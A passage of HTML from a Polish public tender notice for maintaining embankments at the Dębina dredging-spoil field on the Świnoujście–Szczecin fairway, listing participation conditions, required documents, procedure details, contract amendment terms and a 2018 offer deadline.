id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje sposobu dokonywania oceny spełniania wyżej wymienionego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający w celu dokonania oceny tego warunku żąda dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego,</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w Rozdziale V ust. 3 pkt. 2 dotyczących sytuacji ekonomicznej lub finansowej Zamawiający żąda następujących dokumentów:a)	dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną wynoszącą co najmniej 100 000,00 zł (słownie sto tysięcy złotych).</span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a)	Zamawiający w celu dokonania oceny tego warunku żąda wykazu robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; b)	Zamawiający w celu dokonania oceny tego warunku żąda wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w Rozdziale V ust. 3 pkt. 3 dotyczących zdolności technicznej lub zawodowej Zamawiający żąda następujących dokumentów:a)	wykazu robót budowlanych - Załącznik nr 5 do SIWZ, wykonania co najmniej jednej roboty budowlanej podobnej do przedmiotu zamówienia o wartości minimum 50 000,00 zł ( za prace podobne Zamawiający uzna prace w zakresie budowy lub remontu umocnień: brzegów morskich, tam przeciwpowodziowych, wałów, zbiorników retencyjnych , nabrzeży , falochronów, ostróg);b)	wykazu osób - Załącznik nr 6 do SIWZ, skierowanych przez Wykonawcę do realizacji zamówienia. Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli będzie dysponował osoba pełniącą funkcję kierownika budowy z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności hydrotechnicznej bądź w przypadku uzyskania uprawnień w okresach obowiązywania wcześniejszych wersji prawa budowlanego- konstrukcyjno-inżynieryjnej w zakresie budowli hydrotechnicznych i melioracyjnych albo w specjalności konstrukcyjno-budowlanej bez ograniczeń, który kierował wykonaniem jednej roboty budowlanej wartości minimum 50 000 złotych brutto.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda następujących dokumentów:a)	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13,14 i 21 ustawy,b)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w Rozdziale V ust. 3 pkt. 2 dotyczących sytuacji ekonomicznej lub finansowej Zamawiający żąda następujących dokumentów:a)	dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną wynoszącą co najmniej 100 000,00 zł (słownie sto tysięcy złotych).W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w Rozdziale V ust. 3 pkt. 3 dotyczących zdolności technicznej lub zawodowej Zamawiający żąda następujących dokumentów:a)	wykazu robót budowlanych - Załącznik nr 5 do SIWZ, wykonania co najmniej jednej roboty budowlanej podobnej do przedmiotu zamówienia o wartości minimum 50 000,00 zł ( za prace podobne Zamawiający uzna prace w zakresie budowy lub remontu umocnień: brzegów morskich, tam przeciwpowodziowych, wałów, zbiorników retencyjnych , nabrzeży , falochronów, ostróg);b)	wykazu osób - Załącznik nr 6 do SIWZ, skierowanych przez Wykonawcę do realizacji zamówienia. Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli będzie dysponował osoba pełniącą funkcję kierownika budowy z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności hydrotechnicznej bądź w przypadku uzyskania uprawnień w okresach obowiązywania wcześniejszych wersji prawa budowlanego- konstrukcyjno-inżynieryjnej w zakresie budowli hydrotechnicznych i melioracyjnych albo w specjalności konstrukcyjno-budowlanej bez ograniczeń, który kierował wykonaniem jednej roboty budowlanej wartości minimum 50 000 złotych brutto.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Inne dokumenty , które należy dołączyć do oferty:1)	wypełniony i podpisany Formularz ofertowy stanowiący Załącznik nr 1A i/lub 1B do SIWZ;2)	pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów, jeżeli są wymagane;3)	dokumenty dotyczące zdolności lub sytuacji innych podmiotów wymienionych w ust. 2.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1)	Wszelkie zmiany Umowy, wymagają formy pisemnej pod rygorem nieważności i są wprowadzane w formie aneksu.2)	Zamawiający na podstawie art. 144 ust. 1 ustawy Pzp przewiduje możliwość zmian postanowień Umowy w następującym zakresie:a)	Zmiana terminu zakończenia robót nastąpić może wyłącznie za zgodą Zamawiającego jedynie w przypadku wystąpienia przeszkód nieleżących po stronie Wykonawcy, których nie można było przewidzieć w momencie zawarcia Umowy (np wystąpienie warunków pogodowych uniemożliwiających kontynuację prac: przy występowaniu trudnych warunków hydrometeorologicznych, tj. stanie morza powyżej 3, znacznym ograniczeniu widoczności, wysokim stanie wody powyżej 30 cm średniego stanu wody; wstrzymanie prac na podstawie stosownej decyzji organu administracji publicznej - z przyczyn nie leżących po stronie Wykonawcy). Termin może zostać przesunięty wyłącznie o czas trwania przeszkód. b)	W przypadku konieczności wykonania prac dodatkowych, niezbędnych do realizacji przedmiotu umowy, których wykonanie z przyczyn obiektywnych będzie uniemożliwiało wykonanie prac objętych umową w terminie - strony dopuszczają zmianę terminu umowy o czas niezbędny dla wykonania prac dodatkowych.c)	Jeżeli w trakcie realizacji Przedmiotu Umowy wystąpi konieczność wykonania robót dodatkowych i/lub zamiennych lub istotnych zmian w stosunku do przyjętych rozwiązań w Opisie Przedmiotu Zamówienia, wykonanie ich oraz zmiana wynagrodzenia może nastąpić tylko wówczas, gdy Wykonawca na podstawie dokumentów określonych w § 1 i przy dołożeniu należytej staranności, nie mógł przewidzieć, iż nastąpi konieczność wykonania tych robót. d)	Zmiany terminu płatności wynagrodzenia w przypadku zmiany przepisów powszechnie obowiązujących. e)	Zmiany przepisów dotyczących stawki podatku VAT obciążającego przedmiot umowy w trakcie jej realizacji. Podatek VAT będzie naliczany w wartościach wynikających z przepisów obowiązujących w dniu wystawienia faktury.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-04-19</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Bieżące utrzymanie wałów na kwaterach pola refulacyjnego Dębina</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część A- Bieżące utrzymanie wałów na kwaterach pola refulacyjnego Dębina 1)	Lokalizacja : Pole Dębina zlokalizowane jest na 60 km toru wodnego Świnoujście - Szczecin, na wschodnim brzegu rzeki Odra na wysokości nabrzeża HUK, przeznaczone do odkładania urobku z pogłębiania toru na od km 67,70 do 32,00.Powierzchnia całkowita pola wynosi 31,38 ha, w tym powierzchnia kwater 20,24 ha. Całkowita długość obwałowań 2.679 m, pole jest podzielone na dwie kwatery: północną i południową.2)	